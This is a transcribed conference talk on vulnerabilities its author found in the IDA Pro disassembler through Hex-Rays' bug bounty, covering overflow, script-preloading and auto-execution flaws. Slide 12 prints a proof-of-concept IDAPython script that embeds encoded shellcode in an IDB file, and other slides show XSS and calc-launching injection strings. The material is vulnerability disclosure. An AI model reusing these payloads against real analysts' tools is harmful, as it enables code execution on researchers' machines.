IDA Pro is an advanced disassembler software and often used in vulnerability research and malware analysis. IDA Pro is used to analyse software behavior in detail, if there was a vulnerability and the user is attacked not only can it have impact in a social sense but also impact legal proceedings. In this presentation I will discuss the vulnerabilities found and attacks leveraging the vulnerabilities and Hex-rays's remediation process and dialogue I had with them. http://codeblue.jp/en-speaker.html#MasaakiChida

1. IDA’s Vulnerabilities and Bug
Bounty Program
Masaaki Chida

2. Profile
! Security Engineer
! Interested in Reverse Engineering
! Participant in the sutegoma2 CTF team

3. What is IDA？
! Fully Featured Disassembler
! Static analysis software used for analyzing malware etc.
! Hex-rays’ Bug Bounty Program
! 3000 USD Reward
! Rewards for remote attacks against IDA and the Hex-rays
Decompiler
! Started around February 2011
! By January 2014, there were 11 bounties awarded
https://www.hex-rays.com/bugbounty.shtml

4. Bug Bounty Program Impressions
! Identified various types of vulnerabilities, more than
expected
! Hex-rays responded rapidly
! During normal business hours, email replies were immediate
! They also sent patches if the fixes were quick
! Parts that were difficult
! Creating the proof of concept exploit code
! Reproducing file formats
! Writing reports
! English
! Writing vulnerability details for people other than security engineers

5. Research Methodology
! Analysis in IDA
! IDA Main Program (for windows)
! Loader Modules
! Processor Modules
! Plugins
! Read the SDK plugins’ source code
! Observed the running processes’ actions
! Sysinternals Tools: Procmon

6. Investigating functions that handle IO
! Data Read & Copy
! read, lread, eread, qread, qlread, qfread,
! memcpy, strcpy, strncpy, qstrncpy, …
! IDB Database
! get_long, get_byte, ger_many_bytes,
! netnode_getblob, netnode_altval, netnode_supval,
! unpack_dd, unpack_ds, unpack_dw, …
! Heap Allocation
! malloc, calloc, realloc
! qalloc, qcalloc, qrelloc
! qvecto_reserve

7. Script and command execution functions
! IDC Script
! CompileEx, CompileLineEx
! str2ea, calcexpr, calcexpr_long, calc_idc_expr,
! Eval, ExecIDC, Execute File, Execute Line,…
! Command Execution
! call_system
! system, CrateProcess,…

8. Summary of Identified IDA Vulnerabilities
! Heap Overflow => Many
! Stack Overflow => ２
! DLL, Script Preloading => Many
! Path Traversal => Several
! Automatic IDC script execution
! Automatic debugger execution
! ※These include bugs that were not eligible for bounty
rewards

9. Integer Overflow Vulnerabilities
! Problems
! Almost all modules were a target
! No integer overflow protections
! Even functions like qcalloc were unprotected
By exploiting buffer overflows it is possible to execute
arbitrary code in many of the modules
void *__cdecl qcalloc(size_t nitems, size_t itemsize) {
void *result; // eax@2
void *v3; // ebx@3
if ( (signed int)(itemsize * nitems) > 0 ) {
v3 = calloc(itemsize * nitems, 1u);

10. Integer Signedness Vulnerability
! Problem
! Target was the AIF Loader Module
! Stack buffer overflow occurs during analysis of the section
name
By exploiting the stack based buffer overflow it was possible
to execute arbitrary code.

11. Classic Buffer Overflow Vulnerabilities
! Problems
! Target was the .NET Processor Module
! Binary to hex string conversion process
! netnode_getblob() did not validate the size of the input data
By exploiting stack based buffer overflows it was possible
to execute arbitrary code

12. Classic Buffer Overflow Vulnerability
! #For Windows XP SP3 Japanese Edition
! from idaapi import *;from struct import *
! a = 0x5874768A-0x24; b = 0x5874764A-0x14
! shellcode="htIIGX5tIIGHWPPPSRPPafhExfXf5YrfPDfhS3DTY09fhpzfXf5rRfPDTY01f
RDfhpQDTY09fh3NfXf50rfPfharfXf5dsfPDTY09hBzPKX5ceLJPDfhptDfh9tDTY01fh6Of
Xf5jAfPDTY09hinEufhKWDfhkdfXf5WcfPfhnLfXf5g2fPDTY09fhgRDTY01fhQBfhdtfXf5
QXfPDfhlHDTY09fhaefXf57jfPDfh5PfXf5lVfPDTY09h7YqoX5RFUnPDfhjLDfhttDTY09f
h8wfXf5PvfPDTY09h3YIXX54FiYPDfhatDfhgtDTY01fh7xDfh8pfXf5dofPfhitDTY09fhl
zfXf53FfPfhYtDTY09fhGSfXf59KfPfhWtDTY01fhG0DfhRtTYf19fh3ZfXf55VfPDfhnvDf
h5tDTY01fh6tfXf5FxfPDfhRvDfhJtDTY09fhr0fhCtDTY01hJRVdDfhlKfXf5MRfPDTY09f
hUvDTY09fhmwDfhB4fXf5xhfPhdohchshinfhUifXf5C5fPDhehwshhystfhYjfXf5I6fPDh
hm32hcalchexehfhTHfXf54ffPDfhRhfhKifXf5YDfPDTY09fhU1DRVWRTFfVNfhjsfXf5Er
fPVUafhrWfYf1Lo9f1To9TXLLLrH“
! payload=("1"*8)+(pack("II",a,b)*(9334/8-1))+("x55"*6)
! payload+=shellcode
! payload+=("1"*((len(shellcode)&4)+10-(len(shellcode)%4)))+
(pack("II",a,b)*(16000/8))
! node_id=netnode("$ cli").altval(0x0C000014,'o')
! netnode(node_id).setblob(payload,0,'o')
! IDAPython script that inserts shellcode into an IDB file

13. HTML Injection Vulnerability
! Problem
! Possible to inject arbitrary HTML when exporting analysis to
HTML
! HTML entities were not being escaped
! get_root_filename function
! Qbasename function exhibits odd behavior
! Calling qbasename(“x00:/path/filename”) returns “/path/filename”
Possible to execute XSS when opening the generated
HTML file
from idaapi import *
node=netnode("Root Node")
node.set(“x00:</title><scritp>alert('XSS')</script>")
save_database()

14. Preloading Vulnerability
! Problem
! Automatically loads DLLs, IDC and IDAPython scripts from the
same directory containing the IDB file
! ida.idc, userload.idc
! windbg.exe, dbghelp.dll, dbgeng.dll, …
! idautils.py, idc.py, idaapi.py, …
Possible to automatically read/execute unintended files,
allowing for arbitrary code execution

15. Problems with Debugger Settings
! Problem
! Debug target applications can be UNC paths
! The flag to ignore debugger startup warnings is saved in the
IDB file
Possible to run a malicious remote file without any warning
messages using the runtime debugger

16. Automatic Debugger Execution Vulnerability
! Problem
! Debugger is automatically run during memory dump analysis
! Automatic evaluation of debugger events
! Event Condition,Watch PointView
Possible to execute malicious IDC script when loading an
IDB file made from a memory dump

17. Automatic IDC Script Execution
Vulnerability
! Problem
! Target was the .NET Processor Module
! Using IDA’s hint dialog
! 1. get string of text below the line of the cursor
! 2. Pass it to the extract_name function
! 3. Pass it to the str2ea function
! Behavior of the extract_name function is different
! Control characters present in the NameChars item
within ida.cfg
! IDC Script is implicitly run from the str2ea function parameters
Possible to execute malicious script when parsing .NET
files
str2ea
calcexpr_lon
g
calc_idc_expr
CompileLine
Ex
Run

18. Behavioral Differences in extract_name
[X86, ARM Processor Module, etc…]
Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0)
Exec
---------------------------------------------------------------
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, …
.text:00401000 db 'Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))',0
[.NET Processor Module]
Python>extract_name("Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))", 0)
Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))
---------------------------------------------------------------
.method private static hidebysig void Main(string[] args)
{
ldstr "Exec(char(0x63)+char(0x61)+char(0x6C)+char(0x63))“
}
When positioning the cursor over ”db ‘Exec(char(0x63…” in x86,
nothing occurs. Internally, str2ea(‘Exec’) is executed.
However, in .NET moving the cursor over ”ldstr “Exec(char(0x63…”
causes calc to be popped. Internally, str2ea(‘Exec(“calc”)’) is
executed.

19. DEMO

20. Summary
! Lots of easy to find vulnerabilities still exist
! I think bug bounty programs help in reducing vulnerability
! I want there to be more bug bounty programs
! There are other bug bounty programs already running
! Those who are interested should join!

21. Q&A